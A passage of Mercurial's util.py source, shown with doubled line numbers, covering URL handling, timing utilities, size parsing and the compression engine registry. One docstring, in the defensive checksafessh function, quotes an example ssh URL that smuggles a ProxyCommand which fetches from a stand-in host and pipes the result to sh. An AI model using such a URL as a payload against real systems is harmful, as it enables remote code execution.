2770 2770 s += urlreq.quote(self.host)
2771 2771 else:
2772 2772 s += self.host
2773 2773 if self.port:
2774 2774 s += ':' + urlreq.quote(self.port)
2775 2775 if self.host:
2776 2776 s += '/'
2777 2777 if self.path:
2778 2778 # TODO: similar to the query string, we should not unescape the
2779 2779 # path when we store it, the path might contain '%2f' = '/',
2780 2780 # which we should *not* escape.
2781 2781 s += urlreq.quote(self.path, safe=self._safepchars)
2782 2782 if self.query:
2783 2783 # we store the query in escaped form.
2784 2784 s += '?' + self.query
2785 2785 if self.fragment is not None:
2786 2786 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2787 2787 return s
2788 2788
2789 2789 __str__ = encoding.strmethod(__bytes__)
2790 2790
2791 2791 def authinfo(self):
2792 2792 user, passwd = self.user, self.passwd
2793 2793 try:
2794 2794 self.user, self.passwd = None, None
2795 2795 s = bytes(self)
2796 2796 finally:
2797 2797 self.user, self.passwd = user, passwd
2798 2798 if not self.user:
2799 2799 return (s, None)
2800 2800 # authinfo[1] is passed to urllib2 password manager, and its
2801 2801 # URIs must not contain credentials. The host is passed in the
2802 2802 # URIs list because Python < 2.4.3 uses only that to search for
2803 2803 # a password.
2804 2804 return (s, (None, (s, self.host),
2805 2805 self.user, self.passwd or ''))
2806 2806
2807 2807 def isabs(self):
2808 2808 if self.scheme and self.scheme != 'file':
2809 2809 return True # remote URL
2810 2810 if hasdriveletter(self.path):
2811 2811 return True # absolute for our purposes - can't be joined()
2812 2812 if self.path.startswith(br'\\'):
2813 2813 return True # Windows UNC path
2814 2814 if self.path.startswith('/'):
2815 2815 return True # POSIX-style
2816 2816 return False
2817 2817
2818 2818 def localpath(self):
2819 2819 if self.scheme == 'file' or self.scheme == 'bundle':
2820 2820 path = self.path or '/'
2821 2821 # For Windows, we need to promote hosts containing drive
2822 2822 # letters to paths with drive letters.
2823 2823 if hasdriveletter(self._hostport):
2824 2824 path = self._hostport + '/' + self.path
2825 2825 elif (self.host is not None and self.path
2826 2826 and not hasdriveletter(path)):
2827 2827 path = '/' + path
2828 2828 return path
2829 2829 return self._origpath
2830 2830
2831 2831 def islocal(self):
2832 2832 '''whether localpath will return something that posixfile can open'''
2833 2833 return (not self.scheme or self.scheme == 'file'
2834 2834 or self.scheme == 'bundle')
2835 2835
2836 2836 def hasscheme(path):
2837 2837 return bool(url(path).scheme)
2838 2838
2839 2839 def hasdriveletter(path):
2840 2840 return path and path[1:2] == ':' and path[0:1].isalpha()
2841 2841
2842 2842 def urllocalpath(path):
2843 2843 return url(path, parsequery=False, parsefragment=False).localpath()
2844 2844
2845 2845 def checksafessh(path):
2846 2846 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2847 2847
2848 2848 This is a sanity check for ssh urls. ssh will parse the first item as
2849 2849 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2850 2850 Let's prevent these potentially exploited urls entirely and warn the
2851 2851 user.
2852 2852
2853 2853 Raises an error.Abort when the url is unsafe.
2854 2854 """
2855 2855 path = urlreq.unquote(path)
2856 2856 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2857 2857 raise error.Abort(_('potentially unsafe url: %r') %
2858 2858 (pycompat.bytestr(path),))
2859 2859
2860 2860 def hidepassword(u):
2861 2861 '''hide user credential in a url string'''
2862 2862 u = url(u)
2863 2863 if u.passwd:
2864 2864 u.passwd = '***'
2865 2865 return bytes(u)
2866 2866
2867 2867 def removeauth(u):
2868 2868 '''remove all authentication information from a url string'''
2869 2869 u = url(u)
2870 2870 u.user = u.passwd = None
2871 2871 return bytes(u)
2872 2872
2873 2873 timecount = unitcountfn(
2874 2874 (1, 1e3, _('%.0f s')),
2875 2875 (100, 1, _('%.1f s')),
2876 2876 (10, 1, _('%.2f s')),
2877 2877 (1, 1, _('%.3f s')),
2878 2878 (100, 0.001, _('%.1f ms')),
2879 2879 (10, 0.001, _('%.2f ms')),
2880 2880 (1, 0.001, _('%.3f ms')),
2881 2881 (100, 0.000001, _('%.1f us')),
2882 2882 (10, 0.000001, _('%.2f us')),
2883 2883 (1, 0.000001, _('%.3f us')),
2884 2884 (100, 0.000000001, _('%.1f ns')),
2885 2885 (10, 0.000000001, _('%.2f ns')),
2886 2886 (1, 0.000000001, _('%.3f ns')),
2887 2887 )
2888 2888
2889 2889 @attr.s
2890 2890 class timedcmstats(object):
2891 2891 """Stats information produced by the timedcm context manager on entering."""
2892 2892
2893 2893 # the starting value of the timer as a float (meaning and resulution is
2894 2894 # platform dependent, see util.timer)
2895 2895 start = attr.ib(default=attr.Factory(lambda: timer()))
2896 2896 # the number of seconds as a floating point value; starts at 0, updated when
2897 2897 # the context is exited.
2898 2898 elapsed = attr.ib(default=0)
2899 2899 # the number of nested timedcm context managers.
2900 2900 level = attr.ib(default=1)
2901 2901
2902 2902 def __bytes__(self):
2903 2903 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2904 2904
2905 2905 __str__ = encoding.strmethod(__bytes__)
2906 2906
2907 2907 @contextlib.contextmanager
2908 2908 def timedcm(whencefmt, *whenceargs):
2909 2909 """A context manager that produces timing information for a given context.
2910 2910
2911 2911 On entering a timedcmstats instance is produced.
2912 2912
2913 2913 This context manager is reentrant.
2914 2914
2915 2915 """
2916 2916 # track nested context managers
2917 2917 timedcm._nested += 1
2918 2918 timing_stats = timedcmstats(level=timedcm._nested)
2919 2919 try:
2920 2920 with tracing.log(whencefmt, *whenceargs):
2921 2921 yield timing_stats
2922 2922 finally:
2923 2923 timing_stats.elapsed = timer() - timing_stats.start
2924 2924 timedcm._nested -= 1
2925 2925
2926 2926 timedcm._nested = 0
2927 2927
2928 2928 def timed(func):
2929 2929 '''Report the execution time of a function call to stderr.
2930 2930
2931 2931 During development, use as a decorator when you need to measure
2932 2932 the cost of a function, e.g. as follows:
2933 2933
2934 2934 @util.timed
2935 2935 def foo(a, b, c):
2936 2936 pass
2937 2937 '''
2938 2938
2939 2939 def wrapper(*args, **kwargs):
2940 2940 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
2941 2941 result = func(*args, **kwargs)
2942 2942 stderr = procutil.stderr
2943 2943 stderr.write('%s%s: %s\n' % (
2944 2944 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
2945 2945 time_stats))
2946 2946 return result
2947 2947 return wrapper
2948 2948
2949 2949 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2950 2950 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2951 2951
2952 2952 def sizetoint(s):
2953 2953 '''Convert a space specifier to a byte count.
2954 2954
2955 2955 >>> sizetoint(b'30')
2956 2956 30
2957 2957 >>> sizetoint(b'2.2kb')
2958 2958 2252
2959 2959 >>> sizetoint(b'6M')
2960 2960 6291456
2961 2961 '''
2962 2962 t = s.strip().lower()
2963 2963 try:
2964 2964 for k, u in _sizeunits:
2965 2965 if t.endswith(k):
2966 2966 return int(float(t[:-len(k)]) * u)
2967 2967 return int(t)
2968 2968 except ValueError:
2969 2969 raise error.ParseError(_("couldn't parse size: %s") % s)
2970 2970
2971 2971 class hooks(object):
2972 2972 '''A collection of hook functions that can be used to extend a
2973 2973 function's behavior. Hooks are called in lexicographic order,
2974 2974 based on the names of their sources.'''
2975 2975
2976 2976 def __init__(self):
2977 2977 self._hooks = []
2978 2978
2979 2979 def add(self, source, hook):
2980 2980 self._hooks.append((source, hook))
2981 2981
2982 2982 def __call__(self, *args):
2983 2983 self._hooks.sort(key=lambda x: x[0])
2984 2984 results = []
2985 2985 for source, hook in self._hooks:
2986 2986 results.append(hook(*args))
2987 2987 return results
2988 2988
2989 2989 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2990 2990 '''Yields lines for a nicely formatted stacktrace.
2991 2991 Skips the 'skip' last entries, then return the last 'depth' entries.
2992 2992 Each file+linenumber is formatted according to fileline.
2993 2993 Each line is formatted according to line.
2994 2994 If line is None, it yields:
2995 2995 length of longest filepath+line number,
2996 2996 filepath+linenumber,
2997 2997 function
2998 2998
2999 2999 Not be used in production code but very convenient while developing.
3000 3000 '''
3001 3001 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3002 3002 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3003 3003 ][-depth:]
3004 3004 if entries:
3005 3005 fnmax = max(len(entry[0]) for entry in entries)
3006 3006 for fnln, func in entries:
3007 3007 if line is None:
3008 3008 yield (fnmax, fnln, func)
3009 3009 else:
3010 3010 yield line % (fnmax, fnln, func)
3011 3011
3012 3012 def debugstacktrace(msg='stacktrace', skip=0,
3013 3013 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3014 3014 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3015 3015 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3016 3016 By default it will flush stdout first.
3017 3017 It can be used everywhere and intentionally does not require an ui object.
3018 3018 Not be used in production code but very convenient while developing.
3019 3019 '''
3020 3020 if otherf:
3021 3021 otherf.flush()
3022 3022 f.write('%s at:\n' % msg.rstrip())
3023 3023 for line in getstackframes(skip + 1, depth=depth):
3024 3024 f.write(line)
3025 3025 f.flush()
3026 3026
3027 3027 class dirs(object):
3028 3028 '''a multiset of directory names from a dirstate or manifest'''
3029 3029
3030 3030 def __init__(self, map, skip=None):
3031 3031 self._dirs = {}
3032 3032 addpath = self.addpath
3033 3033 if safehasattr(map, 'iteritems') and skip is not None:
3034 3034 for f, s in map.iteritems():
3035 3035 if s[0] != skip:
3036 3036 addpath(f)
3037 3037 else:
3038 3038 for f in map:
3039 3039 addpath(f)
3040 3040
3041 3041 def addpath(self, path):
3042 3042 dirs = self._dirs
3043 3043 for base in finddirs(path):
3044 3044 if base in dirs:
3045 3045 dirs[base] += 1
3046 3046 return
3047 3047 dirs[base] = 1
3048 3048
3049 3049 def delpath(self, path):
3050 3050 dirs = self._dirs
3051 3051 for base in finddirs(path):
3052 3052 if dirs[base] > 1:
3053 3053 dirs[base] -= 1
3054 3054 return
3055 3055 del dirs[base]
3056 3056
3057 3057 def __iter__(self):
3058 3058 return iter(self._dirs)
3059 3059
3060 3060 def __contains__(self, d):
3061 3061 return d in self._dirs
3062 3062
3063 3063 if safehasattr(parsers, 'dirs'):
3064 3064 dirs = parsers.dirs
3065 3065
3066 3066 def finddirs(path):
3067 3067 pos = path.rfind('/')
3068 3068 while pos != -1:
3069 3069 yield path[:pos]
3070 3070 pos = path.rfind('/', 0, pos)
3071 3071
3072 3072 # compression code
3073 3073
3074 3074 SERVERROLE = 'server'
3075 3075 CLIENTROLE = 'client'
3076 3076
3077 3077 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3078 3078 (u'name', u'serverpriority',
3079 3079 u'clientpriority'))
3080 3080
3081 3081 class compressormanager(object):
3082 3082 """Holds registrations of various compression engines.
3083 3083
3084 3084 This class essentially abstracts the differences between compression
3085 3085 engines to allow new compression formats to be added easily, possibly from
3086 3086 extensions.
3087 3087
3088 3088 Compressors are registered against the global instance by calling its
3089 3089 ``register()`` method.
3090 3090 """
3091 3091 def __init__(self):
3092 3092 self._engines = {}
3093 3093 # Bundle spec human name to engine name.
3094 3094 self._bundlenames = {}
3095 3095 # Internal bundle identifier to engine name.
3096 3096 self._bundletypes = {}
3097 3097 # Revlog header to engine name.
3098 3098 self._revlogheaders = {}
3099 3099 # Wire proto identifier to engine name.
3100 3100 self._wiretypes = {}
3101 3101
3102 3102 def __getitem__(self, key):
3103 3103 return self._engines[key]
3104 3104
3105 3105 def __contains__(self, key):
3106 3106 return key in self._engines
3107 3107
3108 3108 def __iter__(self):
3109 3109 return iter(self._engines.keys())
3110 3110
3111 3111 def register(self, engine):
3112 3112 """Register a compression engine with the manager.
3113 3113
3114 3114 The argument must be a ``compressionengine`` instance.
3115 3115 """
3116 3116 if not isinstance(engine, compressionengine):
3117 3117 raise ValueError(_('argument must be a compressionengine'))
3118 3118
3119 3119 name = engine.name()
3120 3120
3121 3121 if name in self._engines:
3122 3122 raise error.Abort(_('compression engine %s already registered') %
3123 3123 name)
3124 3124
3125 3125 bundleinfo = engine.bundletype()
3126 3126 if bundleinfo:
3127 3127 bundlename, bundletype = bundleinfo
3128 3128
3129 3129 if bundlename in self._bundlenames:
3130 3130 raise error.Abort(_('bundle name %s already registered') %
3131 3131 bundlename)
3132 3132 if bundletype in self._bundletypes:
3133 3133 raise error.Abort(_('bundle type %s already registered by %s') %
3134 3134 (bundletype, self._bundletypes[bundletype]))
3135 3135
3136 3136 # No external facing name declared.
3137 3137 if bundlename:
3138 3138 self._bundlenames[bundlename] = name
3139 3139
3140 3140 self._bundletypes[bundletype] = name
3141 3141
3142 3142 wiresupport = engine.wireprotosupport()
3143 3143 if wiresupport:
3144 3144 wiretype = wiresupport.name
3145 3145 if wiretype in self._wiretypes:
3146 3146 raise error.Abort(_('wire protocol compression %s already '
3147 3147 'registered by %s') %
3148 3148 (wiretype, self._wiretypes[wiretype]))
3149 3149
3150 3150 self._wiretypes[wiretype] = name
3151 3151
3152 3152 revlogheader = engine.revlogheader()
3153 3153 if revlogheader and revlogheader in self._revlogheaders:
3154 3154 raise error.Abort(_('revlog header %s already registered by %s') %
3155 3155 (revlogheader, self._revlogheaders[revlogheader]))
3156 3156
3157 3157 if revlogheader:
3158 3158 self._revlogheaders[revlogheader] = name
3159 3159
3160 3160 self._engines[name] = engine
3161 3161
3162 3162 @property
3163 3163 def supportedbundlenames(self):
3164 3164 return set(self._bundlenames.keys())
3165 3165
3166 3166 @property
3167 3167 def supportedbundletypes(self):
3168 3168 return set(self._bundletypes.keys())
3169 3169
3170 3170 def forbundlename(self, bundlename):
3171 3171 """Obtain a compression engine registered to a bundle name.
3172 3172
3173 3173 Will raise KeyError if the bundle type isn't registered.
3174 3174
3175 3175 Will abort if the engine is known but not available.
3176 3176 """
3177 3177 engine = self._engines[self._bundlenames[bundlename]]
3178 3178 if not engine.available():
3179 3179 raise error.Abort(_('compression engine %s could not be loaded') %
3180 3180 engine.name())
3181 3181 return engine
3182 3182
3183 3183 def forbundletype(self, bundletype):
3184 3184 """Obtain a compression engine registered to a bundle type.
3185 3185
3186 3186 Will raise KeyError if the bundle type isn't registered.
3187 3187
3188 3188 Will abort if the engine is known but not available.
3189 3189 """
3190 3190 engine = self._engines[self._bundletypes[bundletype]]
3191 3191 if not engine.available():
3192 3192 raise error.Abort(_('compression engine %s could not be loaded') %
3193 3193 engine.name())
3194 3194 return engine
3195 3195
3196 3196 def supportedwireengines(self, role, onlyavailable=True):
3197 3197 """Obtain compression engines that support the wire protocol.
3198 3198
3199 3199 Returns a list of engines in prioritized order, most desired first.
3200 3200
3201 3201 If ``onlyavailable`` is set, filter out engines that can't be
3202 3202 loaded.
3203 3203 """
3204 3204 assert role in (SERVERROLE, CLIENTROLE)
3205 3205
3206 3206 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3207 3207
3208 3208 engines = [self._engines[e] for e in self._wiretypes.values()]
3209 3209 if onlyavailable:
3210 3210 engines = [e for e in engines if e.available()]
3211 3211
3212 3212 def getkey(e):
3213 3213 # Sort first by priority, highest first. In case of tie, sort
3214 3214 # alphabetically. This is arbitrary, but ensures output is
3215 3215 # stable.
3216 3216 w = e.wireprotosupport()
3217 3217 return -1 * getattr(w, attr), w.name
3218 3218
3219 3219 return list(sorted(engines, key=getkey))
3220 3220
3221 3221 def forwiretype(self, wiretype):
3222 3222 engine = self._engines[self._wiretypes[wiretype]]
3223 3223 if not engine.available():
3224 3224 raise error.Abort(_('compression engine %s could not be loaded') %
3225 3225 engine.name())
3226 3226 return engine
3227 3227
3228 3228 def forrevlogheader(self, header):
3229 3229 """Obtain a compression engine registered to a revlog header.
3230 3230
3231 3231 Will raise KeyError if the revlog header value isn't registered.
3232 3232 """
3233 3233 return self._engines[self._revlogheaders[header]]
3234 3234
3235 3235 compengines = compressormanager()
3236 3236
3237 3237 class compressionengine(object):
3238 3238 """Base class for compression engines.
3239 3239
3240 3240 Compression engines must implement the interface defined by this class.
3241 3241 """
3242 3242 def name(self):
3243 3243 """Returns the name of the compression engine.
3244 3244
3245 3245 This is the key the engine is registered under.
3246 3246
3247 3247 This method must be implemented.
3248 3248 """
3249 3249 raise NotImplementedError()
3250 3250
3251 3251 def available(self):
3252 3252 """Whether the compression engine is available.
3253 3253
3254 3254 The intent of this method is to allow optional compression engines
3255 3255 that may not be available in all installations (such as engines relying
3256 3256 on C extensions that may not be present).
3257 3257 """
3258 3258 return True
3259 3259
3260 3260 def bundletype(self):
3261 3261 """Describes bundle identifiers for this engine.
3262 3262
3263 3263 If this compression engine isn't supported for bundles, returns None.
3264 3264
3265 3265 If this engine can be used for bundles, returns a 2-tuple of strings of
3266 3266 the user-facing "bundle spec" compression name and an internal
3267 3267 identifier used to denote the compression format within bundles. To
3268 3268 exclude the name from external usage, set the first element to ``None``.
3269 3269
3270 3270 If bundle compression is supported, the class must also implement
3271 3271 ``compressstream`` and `decompressorreader``.
3272 3272
3273 3273 The docstring of this method is used in the help system to tell users
3274 3274 about this engine.
3275 3275 """
3276 3276 return None
3277 3277
3278 3278 def wireprotosupport(self):
3279 3279 """Declare support for this compression format on the wire protocol.
3280 3280
3281 3281 If this compression engine isn't supported for compressing wire
3282 3282 protocol payloads, returns None.
3283 3283
3284 3284 Otherwise, returns ``compenginewireprotosupport`` with the following
3285 3285 fields:
3286 3286
3287 3287 * String format identifier
3288 3288 * Integer priority for the server
3289 3289 * Integer priority for the client
3290 3290
3291 3291 The integer priorities are used to order the advertisement of format
3292 3292 support by server and client. The highest integer is advertised
3293 3293 first. Integers with non-positive values aren't advertised.
3294 3294
3295 3295 The priority values are somewhat arbitrary and only used for default
3296 3296 ordering. The relative order can be changed via config options.
3297 3297
3298 3298 If wire protocol compression is supported, the class must also implement
3299 3299 ``compressstream`` and ``decompressorreader``.
3300 3300 """
3301 3301 return None
3302 3302
3303 3303 def revlogheader(self):
3304 3304 """Header added to revlog chunks that identifies this engine.
3305 3305
3306 3306 If this engine can be used to compress revlogs, this method should
3307 3307 return the bytes used to identify chunks compressed with this engine.
3308 3308 Else, the method should return ``None`` to indicate it does not
3309 3309 participate in revlog compression.
3310 3310 """
3311 3311 return None
3312 3312
3313 3313 def compressstream(self, it, opts=None):
3314 3314 """Compress an iterator of chunks.
3315 3315
3316 3316 The method receives an iterator (ideally a generator) of chunks of
3317 3317 bytes to be compressed. It returns an iterator (ideally a generator)
3318 3318 of bytes of chunks representing the compressed output.
3319 3319
3320 3320 Optionally accepts an argument defining how to perform compression.
3321 3321 Each engine treats this argument differently.
3322 3322 """
3323 3323 raise NotImplementedError()
3324 3324
3325 3325 def decompressorreader(self, fh):
3326 3326 """Perform decompression on a file object.
3327 3327
3328 3328 Argument is an object with a ``read(size)`` method that returns
3329 3329 compressed data. Return value is an object with a ``read(size)`` that
3330 3330 returns uncompressed data.
3331 3331 """
3332 3332 raise NotImplementedError()
3333 3333
3334 3334 def revlogcompressor(self, opts=None):
3335 3335 """Obtain an object that can be used to compress revlog entries.
3336 3336
3337 3337 The object has a ``compress(data)`` method that compresses binary
3338 3338 data. This method returns compressed binary data or ``None`` if
3339 3339 the data could not be compressed (too small, not compressible, etc).
3340 3340 The returned data should have a header uniquely identifying this
3341 3341 compression format so decompression can be routed to this engine.
3342 3342 This header should be identified by the ``revlogheader()`` return
3343 3343 value.
3344 3344
3345 3345 The object has a ``decompress(data)`` method that decompresses
3346 3346 data. The method will only be called if ``data`` begins with
3347 3347 ``revlogheader()``. The method should return the raw, uncompressed
3348 3348 data or raise a ``RevlogError``.
3349 3349
3350 3350 The object is reusable but is not thread safe.
3351 3351 """
3352 3352 raise NotImplementedError()
3353 3353
3354 3354 class _CompressedStreamReader(object):
3355 3355 def __init__(self, fh):
3356 3356 if safehasattr(fh, 'unbufferedread'):
3357 3357 self._reader = fh.unbufferedread
3358 3358 else:
3359 3359 self._reader = fh.read
3360 3360 self._pending = []
3361 3361 self._pos = 0
3362 3362 self._eof = False
3363 3363
3364 3364 def _decompress(self, chunk):
3365 3365 raise NotImplementedError()
3366 3366
3367 3367 def read(self, l):
3368 3368 buf = []
3369 3369 while True:
3370 3370 while self._pending:
3371 3371 if len(self._pending[0]) > l + self._pos:
3372 3372 newbuf = self._pending[0]
3373 3373 buf.append(newbuf[self._pos:self._pos + l])
3374 3374 self._pos += l
3375 3375 return ''.join(buf)
3376 3376
3377 3377 newbuf = self._pending.pop(0)
3378 3378 if self._pos:
3379 3379 buf.append(newbuf[self._pos:])
3380 3380 l -= len(newbuf) - self._pos
3381 3381 else:
3382 3382 buf.append(newbuf)
3383 3383 l -= len(newbuf)
3384 3384 self._pos = 0
3385 3385
3386 3386 if self._eof:
3387 3387 return ''.join(buf)
3388 3388 chunk = self._reader(65536)
3389 3389 self._decompress(chunk)
3390 3390 if not chunk and not self._pending and not self._eof:
3391 3391 # No progress and no new data, bail out
3392 3392 return ''.join(buf)
3393 3393
3394 3394 class _GzipCompressedStreamReader(_CompressedStreamReader):
3395 3395 def __init__(self, fh):
3396 3396 super(_GzipCompressedStreamReader, self).__init__(fh)
3397 3397 self._decompobj = zlib.decompressobj()
3398 3398 def _decompress(self, chunk):
3399 3399 newbuf = self._decompobj.decompress(chunk)
3400 3400 if newbuf:
3401 3401 self._pending.append(newbuf)
3402 3402 d = self._decompobj.copy()
3403 3403 try:
3404 3404 d.decompress('x')
3405 3405 d.flush()
3406 3406 if d.unused_data == 'x':
3407 3407 self._eof = True
3408 3408 except zlib.error:
3409 3409 pass
3410 3410
3411 3411 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3412 3412 def __init__(self, fh):
3413 3413 super(_BZ2CompressedStreamReader, self).__init__(fh)
3414 3414 self._decompobj = bz2.BZ2Decompressor()
3415 3415 def _decompress(self, chunk):
3416 3416 newbuf = self._decompobj.decompress(chunk)
3417 3417 if newbuf:
3418 3418 self._pending.append(newbuf)
3419 3419 try:
3420 3420 while True:
3421 3421 newbuf = self._decompobj.decompress('')
3422 3422 if newbuf:
3423 3423 self._pending.append(newbuf)
3424 3424 else:
3425 3425 break
3426 3426 except EOFError:
3427 3427 self._eof = True
3428 3428
3429 3429 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3430 3430 def __init__(self, fh):
3431 3431 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3432 3432 newbuf = self._decompobj.decompress('BZ')
3433 3433 if newbuf:
3434 3434 self._pending.append(newbuf)
3435 3435
3436 3436 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3437 3437 def __init__(self, fh, zstd):
3438 3438 super(_ZstdCompressedStreamReader, self).__init__(fh)
3439 3439 self._zstd = zstd
3440 3440 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3441 3441 def _decompress(self, chunk):
3442 3442 newbuf = self._decompobj.decompress(chunk)
3443 3443 if newbuf:
3444 3444 self._pending.append(newbuf)
3445 3445 try:
3446 3446 while True:
3447 3447 newbuf = self._decompobj.decompress('')
3448 3448 if newbuf:
3449 3449 self._pending.append(newbuf)
3450 3450 else:
3451 3451 break
3452 3452 except self._zstd.ZstdError:
3453 3453 self._eof = True
3454 3454
3455 3455 class _zlibengine(compressionengine):
3456 3456 def name(self):
3457 3457 return 'zlib'
3458 3458
3459 3459 def bundletype(self):
3460 3460 """zlib compression using the DEFLATE algorithm.
3461 3461
3462 3462 All Mercurial clients should support this format. The compression
3463 3463 algorithm strikes a reasonable balance between compression ratio
3464 3464 and size.
3465 3465 """
3466 3466 return 'gzip', 'GZ'
3467 3467
3468 3468 def wireprotosupport(self):
3469 3469 return compewireprotosupport('zlib', 20, 20)
3470 3470
3471 3471 def revlogheader(self):
3472 3472 return 'x'
3473 3473
3474 3474 def compressstream(self, it, opts=None):
3475 3475 opts = opts or {}
3476 3476
3477 3477 z = zlib.compressobj(opts.get('level', -1))
3478 3478 for chunk in it:
3479 3479 data = z.compress(chunk)
3480 3480 # Not all calls to compress emit data. It is cheaper to inspect
3481 3481 # here than to feed empty chunks through generator.
3482 3482 if data:
3483 3483 yield data
3484 3484
3485 3485 yield z.flush()
3486 3486
3487 3487 def decompressorreader(self, fh):
3488 3488 return _GzipCompressedStreamReader(fh)
3489 3489
3490 3490 class zlibrevlogcompressor(object):
3491 3491 def compress(self, data):
3492 3492 insize = len(data)
3493 3493 # Caller handles empty input case.
3494 3494 assert insize > 0
3495 3495
3496 3496 if insize < 44:
3497 3497 return None
3498 3498
3499 3499 elif insize <= 1000000:
3500 3500 compressed = zlib.compress(data)
3501 3501 if len(compressed) < insize:
3502 3502 return compressed
3503 3503 return None
3504 3504
3505 3505 # zlib makes an internal copy of the input buffer, doubling
3506 3506 # memory usage for large inputs. So do streaming compression
3507 3507 # on large inputs.
3508 3508 else:
3509 3509 z = zlib.compressobj()
3510 3510 parts = []
3511 3511 pos = 0
3512 3512 while pos < insize:
3513 3513 pos2 = pos + 2**20
3514 3514 parts.append(z.compress(data[pos:pos2]))
3515 3515 pos = pos2
3516 3516 parts.append(z.flush())
3517 3517
3518 3518 if sum(map(len, parts)) < insize:
3519 3519 return ''.join(parts)
3520 3520 return None
3521 3521
3522 3522 def decompress(self, data):
3523 3523 try:
3524 3524 return zlib.decompress(data)
3525 3525 except zlib.error as e:
3526 3526 raise error.RevlogError(_('revlog decompress error: %s') %
3527 3527 stringutil.forcebytestr(e))
3528 3528
3529 3529 def revlogcompressor(self, opts=None):
3530 3530 return self.zlibrevlogcompressor()
3531 3531
3532 3532 compengines.register(_zlibengine())
3533 3533
3534 3534 class _bz2engine(compressionengine):
3535 3535 def name(self):
3536 3536 return 'bz2'
3537 3537
3538 3538 def bundletype(self):
3539 3539 """An algorithm that produces smaller bundles than ``gzip``.
3540 3540
3541 3541 All Mercurial clients should support this format.
3542 3542
3543 3543 This engine will likely produce smaller bundles than ``gzip`` but
3544 3544 will be significantly slower, both during compression and
3545 3545 decompression.
3546 3546
3547 3547 If available, the ``zstd`` engine can yield similar or better
3548 3548 compression at much higher speeds.
3549 3549 """
3550 3550 return 'bzip2', 'BZ'
3551 3551
3552 3552 # We declare a protocol name but don't advertise by default because
3553 3553 # it is slow.
3554 3554 def wireprotosupport(self):
3555 3555 return compewireprotosupport('bzip2', 0, 0)
3556 3556
3557 3557 def compressstream(self, it, opts=None):
3558 3558 opts = opts or {}
3559 3559 z = bz2.BZ2Compressor(opts.get('level', 9))
3560 3560 for chunk in it:
3561 3561 data = z.compress(chunk)
3562 3562 if data:
3563 3563 yield data
3564 3564
3565 3565 yield z.flush()
3566 3566
3567 3567 def decompressorreader(self, fh):
3568 3568 return _BZ2CompressedStreamReader(fh)
3569 3569
3570 3570 compengines.register(_bz2engine())
3571 3571
3572 3572 class _truncatedbz2engine(compressionengine):
3573 3573 def name(self):
3574 3574 return 'bz2truncated'
3575 3575
3576 3576 def bundletype(self):
3577 3577 return None, '_truncatedBZ'
3578 3578
3579 3579 # We don't implement compressstream because it is hackily handled elsewhere.
3580 3580
3581 3581 def decompressorreader(self, fh):
3582 3582 return _TruncatedBZ2CompressedStreamReader(fh)
3583 3583
3584 3584 compengines.register(_truncatedbz2engine())
3585 3585
3586 3586 class _noopengine(compressionengine):
3587 3587 def name(self):
3588 3588 return 'none'
3589 3589
3590 3590 def bundletype(self):
3591 3591 """No compression is performed.
3592 3592
3593 3593 Use this compression engine to explicitly disable compression.
3594 3594 """
3595 3595 return 'none', 'UN'
3596 3596
3597 3597 # Clients always support uncompressed payloads. Servers don't because
3598 3598 # unless you are on a fast network, uncompressed payloads can easily
3599 3599 # saturate your network pipe.
3600 3600 def wireprotosupport(self):
3601 3601 return compewireprotosupport('none', 0, 10)
3602 3602
3603 3603 # We don't implement revlogheader because it is handled specially
3604 3604 # in the revlog class.
3605 3605
3606 3606 def compressstream(self, it, opts=None):
3607 3607 return it
3608 3608
3609 3609 def decompressorreader(self, fh):
3610 3610 return fh
3611 3611
3612 3612 class nooprevlogcompressor(object):
3613 3613 def compress(self, data):
3614 3614 return None
3615 3615
3616 3616 def revlogcompressor(self, opts=None):
3617 3617 return self.nooprevlogcompressor()
3618 3618
3619 3619 compengines.register(_noopengine())
3620 3620
3621 3621 class _zstdengine(compressionengine):
3622 3622 def name(self):
3623 3623 return 'zstd'
3624 3624
3625 3625 @propertycache
3626 3626 def _module(self):
3627 3627 # Not all installs have the zstd module available. So defer importing
3628 3628 # until first access.
3629 3629 try:
3630 3630 from . import zstd
3631 3631 # Force delayed import.
3632 3632 zstd.__version__
3633 3633 return zstd
3634 3634 except ImportError:
3635 3635 return None
3636 3636
3637 3637 def available(self):
3638 3638 return bool(self._module)
3639 3639
3640 3640 def bundletype(self):
3641 3641 """A modern compression algorithm that is fast and highly flexible.
3642 3642
3643 3643 Only supported by Mercurial 4.1 and newer clients.
3644 3644
3645 3645 With the default settings, zstd compression is both faster and yields
3646 3646 better compression than ``gzip``. It also frequently yields better
3647 3647 compression than ``bzip2`` while operating at much higher speeds.
3648 3648
3649 3649 If this engine is available and backwards compatibility is not a
3650 3650 concern, it is likely the best available engine.
3651 3651 """
3652 3652 return 'zstd', 'ZS'
3653 3653
3654 3654 def wireprotosupport(self):
3655 3655 return compewireprotosupport('zstd', 50, 50)
3656 3656
3657 3657 def revlogheader(self):
3658 3658 return '\x28'
3659 3659
3660 3660 def compressstream(self, it, opts=None):
3661 3661 opts = opts or {}
3662 3662 # zstd level 3 is almost always significantly faster than zlib
3663 3663 # while providing no worse compression. It strikes a good balance
3664 3664 # between speed and compression.
3665 3665 level = opts.get('level', 3)
3666 3666
3667 3667 zstd = self._module
3668 3668 z = zstd.ZstdCompressor(level=level).compressobj()
3669 3669 for chunk in it:
